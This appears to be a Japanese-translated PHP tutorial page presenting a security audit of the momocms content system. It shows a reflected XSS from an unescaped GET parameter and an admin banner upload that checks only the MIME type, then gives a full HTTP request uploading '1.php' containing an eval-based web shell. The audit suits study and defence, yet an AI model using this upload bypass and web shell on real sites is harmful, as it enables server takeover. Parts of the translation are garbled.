ホームページ >バックエンド開発 >PHPチュートリアル >momocms コード監査
暇なときにウェブマスターホームで人気の番組を見つけたのでダウンロードして見てみました。
フロントエンド $_GET は intval() 関数を使用してフィルタリングされており、悪用できるものは何もありません。
admincreate_sub_product.php
<span style="font-family:Microsoft YaHei;font-size:18px;"><input type="hidden" name="category" value="<?php echo $_GET['id']; ?>"> <p> </span>
Seの96行目にxssがあります
cond: 脆弱性
を admin/banner_do にアップロードします.php
のコードは次のとおりです
<span style="font-family:Microsoft YaHei;font-size:18px;">require("./database.php"); if(empty($_SESSION['momocms_admin'])){ header("Location:./index.php"); exit; } if($_SESSION['momocms_isAdmin']==1){ if (($_FILES["banner"]["type"] == "image/gif") || ($_FILES["banner"]["type"] == "image/jpeg") || ($_FILES["banner"]["type"] == "image/png") || ($_FILES["banner"]["type"] == "image/pjpeg")) { if ($_FILES["banner"]["error"] > 0){ echo "Return Code: " . $_FILES["banner"]["error"] . "<br />"; }else{ if(!is_dir("../resource/slide/images")){ mkdir("../resource/slide/images"); } $pos = strrpos($_FILES["banner"]["name"],"."); $back = substr($_FILES["banner"]["name"],$pos); $_FILES["banner"]["name"] = time().$back; move_uploaded_file($_FILES["banner"]["tmp_name"], "../resource/slide/images/". $_FILES["banner"]["name"]); $pic="../resource/slide/images/". $_FILES["banner"]["name"]; echo '<script> parent.document.getElementById("successMsg").style.display="block"; setTimeout(function(){ parent.window.location.href="./banner.php"; },1500); </script>'; } } } </span>
Upload to はアップロードの種類を決定しますが、アップロードのサフィックスなどは決定しないことがわかります。
それで、Content-type: image/jpeg を構築してアップロードを突破することができます
<span style="font-family:Microsoft YaHei;font-size:18px;">POST /test/momocms/admin/banner_do.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/test/momocms/admin/banner.php Cookie: PHPSESSID=a920be64bc19dc2b620e7ddab2441811 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------13761195204349 Content-Length: 227 -----------------------------13761195204349 Content-Disposition: form-data; name="banner"; filename="1.php" Content-Type: image/jpeg <?php eval($_POST['w']);?> -----------------------------13761195204349-- </span>
次に、どこで PHP ソースコードを直接変更できますか?背景ウィジェット
とりあえずたくさん見ました。他にも後ほど見ていきます。
上記では、momocms コード監査の側面も含めて紹介していますが、PHP チュートリアルに興味のある友人に役立つことを願っています。